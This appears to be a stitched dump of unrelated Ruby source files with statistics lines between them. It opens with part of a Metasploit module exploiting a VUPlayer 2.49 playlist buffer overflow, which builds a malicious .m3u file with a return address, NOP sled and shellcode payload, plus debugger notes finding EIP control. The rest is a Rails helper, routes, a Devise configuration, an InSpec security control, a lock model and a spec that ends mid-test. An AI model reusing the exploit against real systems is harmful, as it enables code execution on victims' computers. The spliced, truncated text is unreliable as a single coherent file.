'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2006-6251' ],
[ 'OSVDB', '31710' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ],
],
'Privileged' => false,
'DisclosureDate' => 'Aug 18 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
], self.class)
end
def exploit
m3u = rand_text_alpha_upper(2024)
m3u[1012,4] = [target.ret].pack('V')
m3u[1016,12] = "\x90" * 12
m3u[1028,payload.encoded.length] = payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(m3u)
end
end
=begin
0:000> r eip
eip=68423768
0:000> !pattern_offset 2024
[Byakugan] Control of ecx at offset 996.
[Byakugan] Control of ebp at offset 1008.
[Byakugan] Control of eip at offset 1012.
0:000> d esp
0012ef44 39684238 42306942 69423169 33694232 8Bh9Bi0Bi1Bi2Bi3
0012ef54 42346942 69423569 37694236 42386942 Bi4Bi5Bi6Bi7Bi8B
0012ef64 6a423969 316a4230 42326a42 6a42336a i9Bj0Bj1Bj2Bj3Bj
0012ef74 356a4234 42366a42 6a42376a 396a4238 4Bj5Bj6Bj7Bj8Bj9
0012ef84 42306b42 6b42316b 336b4232 42346b42 Bk0Bk1Bk2Bk3Bk4B
0012ef94 6b42356b 376b4236 42386b42 6c42396b k5Bk6Bk7Bk8Bk9Bl
0:000> s -b 0x10100000 0x1010a000 ff e4
1010539f ff e4 49 10 10 20 05 93-19 01 00 00 00 9c 53 10 ..I.. ........S.
0:000> u 0x1010539f L1
BASSWMA!BASSplugin+0xe9a:
1010539f ffe4 jmp esp
=end | 28.791667 | 101 | 0.626628 |
e28e6ceb38b8a7a8fba95f0e2c5eeaf7082fe10d | 595 | # frozen_string_literal: true
module HomesHelper
def user_name
session[:mastodon][:extra][:raw_info][:username]
end
def display_name
session[:mastodon][:extra][:raw_info][:display_name]
end
def avatar
session[:mastodon][:extra][:raw_info][:avatar]
end
def domain
URI.parse(session[:mastodon][:extra][:raw_info][:url]).host
end
def user_created_at
Time.zone.parse(session[:mastodon][:extra][:raw_info][:created_at])
end
def formatted_birthday
l user_created_at, format: :long
end
def range
time_ago_in_words(user_created_at)
end
end
| 18.59375 | 71 | 0.705882 |
334b78de4e23515da81df5b303066781dbae90a6 | 444 | cask :v1 => 'xtorrent' do
version '2.1 (v171)'
sha256 '26ea235dcb827c6e58ab3409bec83396e86704d742d517e527016ecd44672379'
url "http://acquisition.dreamhosters.com/xtorrent/Xtorrent#{version.gsub(' ','')}.dmg"
appcast 'http://xtorrent.s3.amazonaws.com/appcast.xml',
:sha256 => '21d8752a39782479a9f6f2485b0aba0af3f1f12d17ebc938c7526e5ca1a8b355'
homepage 'http://www.xtorrent.com'
license :freemium
app 'Xtorrent.app'
end
| 34.153846 | 88 | 0.75 |
6170ef9f8cc368a4e716a0ddb4725e9df8c21224 | 954 | # frozen_string_literal: true
Rails.application.routes.draw do
get 'password_resets/new'
get 'password_resets/edit'
get 'sessions/new'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
root 'static_pages#home'
get '/home', to: 'static_pages#home'
get '/help', to: 'static_pages#help'
get '/about', to: 'static_pages#about'
get '/contact', to: 'static_pages#contact'
get '/signup', to: 'users#new'
post '/signup', to: 'users#create'
get '/login', to: 'sessions#new'
post '/login', to: 'sessions#create'
delete '/logout', to: 'sessions#destroy'
resources :users do
member do
get :following, :followers
end
end
resources :account_activations, only: [:edit]
resources :password_resets, only: [:new, :create, :edit, :update]
resources :microposts, only: [:create, :destroy]
resources :relationships, only: [:create, :destroy]
end
| 30.774194 | 101 | 0.677149 |
acd5aa5bfb1a0cfeae19c8fa35b21c094b5e6dbb | 233 | module RailsHooks
module Hooks
def self.table_name_prefix
'hooks_'
end
end
end
RailsHooks::Observer::Event.when_triggered do |record, event|
event.hooks.each do |hook|
hook.notify(record, event.id)
end
end
| 16.642857 | 61 | 0.708155 |
d523c054db58e880aa759d67b6bf5503f73a7519 | 1,898 | module Xeroizer
class OAuth2
attr_reader :client, :access_token
attr_accessor :tenant_id
def initialize(client_key, client_secret, options = {})
@client = ::OAuth2::Client.new(client_key, client_secret, options)
end
def authorize_url(options)
@client.auth_code.authorize_url(options)
end
def authorize_from_access(access_token, options = {})
@access_token = ::OAuth2::AccessToken.new(client, access_token, options)
end
def authorize_from_code(code, options = {})
@access_token = @client.auth_code.get_token(code, options)
end
def authorize_from_client_credentials(params = {}, options = {})
@access_token = @client.client_credentials.get_token(params, options)
end
def renew_access_token
@access_token = @access_token.refresh!
end
def get(path, headers = {})
wrap_response(access_token.get(path, headers: wrap_headers(headers)))
end
def post(path, body = "", headers = {})
wrap_response(access_token.post(path, {body: body, headers: wrap_headers(headers)}))
end
def put(path, body = "", headers = {})
wrap_response(access_token.put(path, body: body, headers: wrap_headers(headers)))
end
def delete(path, headers = {})
wrap_response(access_token.delete(path, headers: wrap_headers(headers)))
end
private
def wrap_headers(headers)
if tenant_id
headers.merge("Xero-tenant-id" => tenant_id)
else
headers
end
end
def wrap_response(response)
Response.new(response)
end
class Response
attr_reader :response
def initialize(response)
@response = response
end
def code
response.status
end
def success?
(200..299).to_a.include?(code)
end
def plain_body
response.body
end
end
end
end
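# Illustrative usage sketch (assumed endpoints and ids, not part of this file):
#
#   oauth = Xeroizer::OAuth2.new(client_id, client_secret, site: "https://identity.xero.com")
#   oauth.authorize_from_code(params[:code], redirect_uri: callback_url)
#   oauth.tenant_id = tenant_id
#   response = oauth.get("/api.xro/2.0/Organisation")
#   puts response.plain_body if response.success?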
| 22.86747 | 90 | 0.649104 |
7a7a5ae072dccc784e66e096762a8d84e2975380 | 12,686 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
config.secret_key = Rails.application.secrets.secret_key_base || ENV['SECRET_KEY_BASE']
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [ :email ]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [ :email ]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [ :email ]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If http headers should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 10. If
# using other encryptors, it sets how many times you want the password re-encrypted.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# encryptor), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 10
# Setup a pepper to generate the encrypted password.
# config.pepper = '1eb859c028ba631c1d160334ae468214fd2d74071608b2a68397351557d85a821765d9bd6af2aec3668f5ba2920863025a48d21ba514a30d3932c77fbbce5897'
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day. Default is 0.days, meaning
# the user cannot access the website without confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [ :email ]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 8..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
# config.email_regexp = /\A[^@]+@[^@]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# If true, expires auth token on session timeout.
# config.expire_auth_token_on_timeout = false
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [ :email ]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = false
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [ :email ]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# ==> Configuration for :encryptable
# Allow you to use another encryption algorithm besides bcrypt (default). You can use
# :sha1, :sha512 or encryptors from others authentication tools as :clearance_sha1,
# :authlogic_sha512 (then you should set stretches above to 20 for default behavior)
# and :restful_authentication_sha1 (then you should set stretches to 10, and copy
# REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using omniauth, Devise cannot automatically set Omniauth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
end
| 48.792308 | 150 | 0.748542 |
ffd721b18286216b66f7ed60aca2faab84f7b3dc | 274 | module Rbexy
module Nodes
class AbstractElement < AbstractNode
attr_accessor :name, :members, :children
def initialize(name, members, children)
@name = name
@members = members || []
@children = children
end
end
end
end
| 19.571429 | 46 | 0.613139 |
d5376441129c5190c70f900524ddd37f9d12df50 | 3,755 | # encoding: utf-8
disable_slow_controls = attribute(
'disable_slow_controls',
default: false,
description: 'If enabled, this attribute disables this control and other
controls that consistently take a long time to complete.'
)
exempt_home_users = attribute(
'exempt_home_users',
description: 'These are `home dir` exempt interactive accounts',
default: []
)
non_interactive_shells = attribute(
'non_interactive_shells',
description: 'These shells do not allow a user to login',
default: ["/sbin/nologin","/sbin/halt","/sbin/shutdown","/bin/false","/bin/sync", "/bin/true"]
)
control "V-72037" do
title "Local initialization files must not execute world-writable programs."
if disable_slow_controls
desc "This control consistently takes a long to run and has been disabled
using the disable_slow_controls attribute."
else
desc "If user start-up files execute world-writable programs, especially in
unprotected directories, they could be maliciously modified to destroy user
files or otherwise compromise the system at the user level. If the system is
compromised at the user level, it is easier to elevate privileges to eventually
compromise the system at the root and network level."
end
impact 0.5
tag "gtitle": "SRG-OS-000480-GPOS-00227"
tag "gid": "V-72037"
tag "rid": "SV-86661r1_rule"
tag "stig_id": "RHEL-07-020730"
tag "cci": ["CCI-000366"]
tag "documentable": false
tag "nist": ["CM-6 b", "Rev_4"]
tag "check": "Verify that local initialization files do not execute
world-writable programs.
Check the system for world-writable files with the following command:
# find / -perm -002 -type f -exec ls -ld {} \\; | more
For all files listed, check for their presence in the local initialization
files with the following commands:
Note: The example will be for a system that is configured to create users’ home
directories in the \"/home\" directory.
# grep <file> /home/*/.*
If any local initialization files are found to reference world-writable files,
this is a finding."
tag "fix": "Set the mode on files being executed by the local initialization
files with the following command:
# chmod 0755 <file>"
tag "fix_id": "F-78389r1_fix"
if disable_slow_controls
describe "This control consistently takes a long to run and has been disabled
using the disable_slow_controls attribute." do
skip "This control consistently takes a long to run and has been disabled
using the disable_slow_controls attribute. You must enable this control for a
full accredidation for production."
end
else
ignore_shells = non_interactive_shells.join('|')
#Get home directory for users with UID >= 1000 or UID == 0 and support interactive logins.
dotfiles = Set[]
u = users.where{ !shell.match(ignore_shells) && (uid >= 1000 || uid == 0)}.entries
#For each user, build and execute a find command that identifies initialization files
#in a user's home directory.
u.each do |user|
dotfiles = dotfiles + command("find #{user.home} -xdev -maxdepth 2 -name '.*' -type f").stdout.split("\n")
end
ww_files = Set[]
ww_files = command('find / -perm -002 -type f -exec ls {} \;').stdout.lines
#Check each dotfile for existence of each world-writeable file
findings = Set[]
dotfiles.each do |dotfile|
dotfile = dotfile.strip
ww_files.each do |ww_file|
ww_file = ww_file.strip
count = command("grep -c \"#{ww_file}\" \"#{dotfile}\"").stdout.strip.to_i
findings << dotfile if count > 0
end
end
describe "Local initialization files that are found to reference world-writable files" do
subject { findings.to_a }
it { should be_empty }
end
end
end
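# A hedged usage sketch (file name and invocation are illustrative, not part of
# this control): the disable_slow_controls attribute could be supplied at scan
# time through an attributes file, e.g.
#
#   # attrs.yml
#   disable_slow_controls: true
#
#   inspec exec . --attrs attrs.yml
#
# When set, the control is skipped instead of running the expensive find scan.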
| 37.178218 | 112 | 0.71265 |
0148fd1c64e20c0e4117a510020dd020b31f39b7 | 4,252 | require 'zabbix_receiver'
# This file was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause this
# file to always be loaded, without a need to explicitly require it in any files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need it.
#
# The `.rspec` file also contains a few flags that are not defaults but that
# users commonly want.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# These two settings work together to allow you to limit a spec run
# to individual examples or groups you care about by tagging them with
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
# get run.
config.filter_run :focus
config.run_all_when_everything_filtered = true
# Limits the available syntax to the non-monkey patched syntax that is recommended.
# For more details, see:
# - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
# - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
config.disable_monkey_patching!
# This setting enables warnings. It's recommended, but in some cases may
# be too noisy due to issues in dependencies.
config.warnings = true
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = 'doc'
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
| 46.217391 | 129 | 0.745061 |
116ab951b58e7ec4b60e006a2f578c0c0d6a4fb0 | 3,621 | class Lock < ActiveRecord::Base
# Get an atomic lock if value matches or is nil. Block until lock was successful if args[:blocking] was set to true
def self.get name, args = {}
poll_time = args[:poll_time] || 10
start_time = Time.now
until (lock = get_lock_for(name, args)) || args[:blocking] != true || (args[:timeout] && (Time.now - start_time) > args[:timeout]) do
sleep poll_time
end
lock
end
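  # A hedged usage sketch (the lock name and value are hypothetical):
  #
  #   if Lock.get('reports:rebuild', value: "task #{task.id}", blocking: true, timeout: 60)
  #     begin
  #       rebuild_reports
  #     ensure
  #       Lock.release('reports:rebuild', value: "task #{task.id}")
  #     end
  #   end
  #
  # With blocking: true the call polls every poll_time seconds until the lock
  # is acquired or the optional timeout elapses.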
# Release an atomic lock if value matches or is nil
def self.release names, args = {}
successful = false
    if names
      # If names is a single string, transform it to an array
names = [names.to_s] if names.class == String || names.class == Symbol
self.transaction do
locks = self.where(:name => names).lock(true).all
unless locks.blank?
successful = true
# Check, if the value of every selected lock matches the args[:value] unless no args[:value] was specified
locks.each{ |l| successful = false unless (args[:value].nil? || (args[:value] != nil && args[:value] == l.value)) }
# Now destroy the locks, if it is successful
locks.each{ |l| l.destroy } if successful
end
end
end
successful
end
# Release all locks for a given task. This is only working, if the value was set to "task #{task.id}"
def self.release_for_task task
self.transaction do
locks = self.where(:value => "task #{task.id}").lock(true).all
locks.each{ |l| l.destroy }
end
end
# Return value of a lock. When no lock was found, nil will be returned.
def self.get_value name
lock = self.where(:name => name).first
if lock
lock.value.nil? ? '' : lock.value
else
nil
end
end
# Destroy all locks in one atomic operation
def self.release_all
self.transaction do
self.all.each { |l| l.destroy }
end
end
private
# Get an atomic lock if value matches or is nil
def self.get_lock_for names, args = {}
successful_if_value_matches = args[:successful_if].to_s == 'value_matches'
successful = false
if names
# If names is a single string, transorm it to an array
names = [names.to_s] if names.class == String || names.class == Symbol
self.transaction do
locks = self.where(:name => names).lock(true).all
if locks.blank?
names.each{ |n| self.create :name => n, :value => args[:value] }
successful = true
else
if args[:force]
names.each do |n|
lock = locks.find{ |l| l.name == n }
if lock
lock.update_attribute :value, args[:value]
else
self.create :name => n, :value => args[:value]
end
end
successful = true
elsif successful_if_value_matches && args[:value] != nil
successful = true
created_locks = []
names.each do |n|
lock = locks.find{ |l| l.name == n }
if lock
successful = false if lock.value != args[:value]
else
created_locks << self.create(:name => n, :value => args[:value])
end
end
# Rollback created locks, if the lock acquire was not successful
created_locks.each{ |l| l.destroy } unless successful
end
end
# Wait some seconds inside the transaction for debuging and testing purposes
sleep args[:debug_wait].to_i if args[:debug_wait]
end
end
successful
end
end
| 29.92562 | 137 | 0.582988 |
878e852f2f6024610a61d0c26cc0234da8e5203c | 356 | require 'rubygems'
require 'jquery-fileupload-rails'
require 'paperclip'
require 'bourbon'
require 'ruby_gallery/attachments_controller'
module RubyGallery
class Engine < Rails::Engine
ActionController::Base.send(:extend, RubyGallery::AttachmentsController)
# same as ActionController::Base.extend(RubyGallery::AttachmentsController)
end
end | 29.666667 | 79 | 0.800562 |
1af383bf50b1b010e31226d0252a976d6418599c | 835 | require 'authzed/api/v0/acl_service_pb'
require 'authzed/api/v0/acl_service_services_pb'
require 'authzed/api/v0/core_pb'
require 'authzed/api/v0/developer_pb'
require 'authzed/api/v0/developer_services_pb'
require 'authzed/api/v0/namespace_pb'
require 'authzed/api/v0/namespace_service_pb'
require 'authzed/api/v0/namespace_service_services_pb'
require 'authzed/api/v0/watch_service_pb'
require 'authzed/api/v0/watch_service_services_pb'
require 'authzed/api/v0/client'
require 'authzed/api/v1alpha1/schema_pb'
require 'authzed/api/v1alpha1/schema_services_pb'
require 'authzed/api/v1alpha1/client'
require 'authzed/api/v1/schema_services_pb'
require 'authzed/api/v1/watch_service_services_pb'
require 'authzed/api/v1/permission_service_services_pb'
require 'authzed/api/v1/client'
require 'grpcutil/bearer_token'
module Authzed
end
| 36.304348 | 55 | 0.838323 |
9131ab64dbe062bc7637484f305b0d284eb3a0fe | 14,277 | require 'rails_helper'
RSpec.describe Mentor::Application, type: :model do
describe 'attributes' do
subject { described_class.new }
it { is_expected.to respond_to :id }
it { is_expected.to respond_to :team_name }
it { is_expected.to respond_to :project_name }
it { is_expected.to respond_to :project_id }
it { is_expected.to respond_to :project_plan }
it { is_expected.to respond_to :why_selected_project }
it { is_expected.to respond_to :choice }
it { is_expected.to respond_to :signed_off_by }
it { is_expected.to respond_to :signed_off_at }
it { is_expected.to respond_to :mentor_fav }
end
describe '.all_for(project_is: choice:)' do
let!(:project1) { create(:project, :in_current_season) }
let!(:project2) { create(:project, :in_current_season) }
let!(:other_project) { create(:project, :in_current_season) }
context 'when first choice project' do
subject { described_class.all_for(projects: projects, choice: 1) }
context 'when passing an empty projects collection' do
let(:projects) { Project.where(id: -99) }
it 'returns an empty array' do
create(:application, :in_current_season, :for_project, project1: project1)
expect(subject).to eq []
end
end
context 'when passing only project1' do
let(:projects) { Project.where(id: project1.id) }
it 'returns applications of the season which chose the project as first choice' do
first_choice = create_list(:application, 3, :in_current_season, :for_project, project1: project1)
second_choice = create(:application, :in_current_season, :for_project, project1: project2, project2: project1)
other = create(:application, :in_current_season, :for_project, project1: project2)
ids = subject.map(&:id)
expect(ids).to match_array first_choice.map(&:id)
expect(ids).not_to include second_choice
expect(ids).not_to include other
end
end
context 'when passing multiple projects' do
let(:projects) { Project.where(id: [project1.id, project2.id]) }
it 'returns applications of the season which chose one of the projects as first choice' do
first_choice1 = create(:application, :in_current_season, :for_project, project1: project1)
first_choice2 = create(:application, :in_current_season, :for_project, project1: project2)
second_choice1 = create(:application, :in_current_season, :for_project, project1: build(:project), project2: project2)
ids = subject.map(&:id)
expect(ids).to contain_exactly(first_choice1.id, first_choice2.id)
end
end
context 'when passing a project from the wrong season' do
let(:projects) { Project.where(id: project1.id) }
it "returns an empty array" do
last_season = Season.create name: Date.today.year - 1
create(:application, :for_project, project1: project1, season: last_season)
expect(subject).to eq []
end
end
end
context 'when second choice project' do
subject { described_class.all_for(projects: projects, choice: 2) }
context 'when passing an empty projects collection' do
let(:projects) { Project.where(id: -99) }
it 'returns an empty array' do
create(:application, :in_current_season, :for_project, project1: project1)
expect(subject).to eq []
end
end
context 'when passing a single project' do
let(:projects) { Project.where(id: project1.id) }
it 'returns applications of the season which chose the project as first choice' do
create(:application, :in_current_season, :for_project, project1: project1)
second_choice = create(:application, :in_current_season, :for_project, project1: project2, project2: project1)
expect(subject.map(&:id)).to contain_exactly second_choice.id
end
end
end
end
describe '.find(id:, projects:, season: Season.current)' do
let!(:project1) { create(:project, :in_current_season) }
let!(:project2) { create(:project, :in_current_season) }
let!(:other_project) { create(:project) }
let(:projects) { Project.where(id: [project1.id, project2.id]) }
shared_examples :found_an_application do |choice|
it 'returns the application mapped as Mentor::Application with Mentor::Students' do
expect(subject).to be_a(Mentor::Application)
expect(subject.student0).to be_a(Mentor::Student)
expect(subject.student1).to be_a(Mentor::Student)
end
it 'contains all relevant attributes' do
expect(subject).to have_attributes(
id: application.id,
project_id: project1.id,
team_name: application.team.name,
project_name: project1.name,
project_plan: application.data.send("plan_project#{choice}"),
why_selected_project: application.data.send("why_selected_project#{choice}"),
choice: choice
)
end
it 'contains all relevant data for student0' do
expect(subject.student0).to have_attributes(
coding_level: application.data.student0_application_coding_level.to_i,
code_samples: application.data.student0_application_code_samples,
learning_history: application.data.student0_application_learning_history,
language_learning_period: application.data.student0_application_language_learning_period,
skills: application.data.student0_application_skills
)
end
it 'contains all relevant data for student1' do
expect(subject.student1).to have_attributes(
coding_level: application.data.student1_application_coding_level.to_i,
code_samples: application.data.student1_application_code_samples,
learning_history: application.data.student1_application_learning_history,
language_learning_period: application.data.student1_application_language_learning_period,
skills: application.data.student1_application_skills
)
end
end
subject { described_class.find(id: application.id, projects: projects) }
context 'when application exists as first choice' do
let!(:application) { create(:application, :in_current_season, :for_project, project1: project1) }
it_behaves_like :found_an_application, 1
end
context 'when application exists as second choice' do
let!(:application) do
create(:application, :in_current_season, :for_project, project1: other_project, project2: project1)
end
it_behaves_like :found_an_application, 2
end
context 'when wrong project' do
let(:projects) { Project.where(id: other_project.id) }
let!(:application) { create(:application, :in_current_season, :for_project, project1: project1) }
it 'raises a NotFound error' do
expect { subject }.to raise_error(ActiveRecord::RecordNotFound)
end
end
context 'when application does not exist' do
let(:application) { double(id: 1) }
it 'raises a NotFound error' do
expect { subject }.to raise_error(ActiveRecord::RecordNotFound)
end
end
end
describe '#find_or_initialize_comment_by(mentor)' do
let(:mentor_application) { described_class.new(id: 1) }
let(:mentor) { create(:mentor) }
subject { mentor_application.find_or_initialize_comment_by(mentor) }
it 'returns the persisted comment when one exists' do
comment = Mentor::Comment.create(commentable_id: mentor_application.id, user: mentor)
expect(subject).to eq comment
end
it 'has the Mentor::Application as commentable type' do
expect(subject).to have_attributes(
commentable_id: mentor_application.id,
commentable_type: described_class.name,
user: mentor
)
end
it 'returns a new comment if none is persisted yet' do
expect(subject).to be_a_new(Mentor::Comment)
end
it 'returns a new comment if a comment for the application is persisted' do
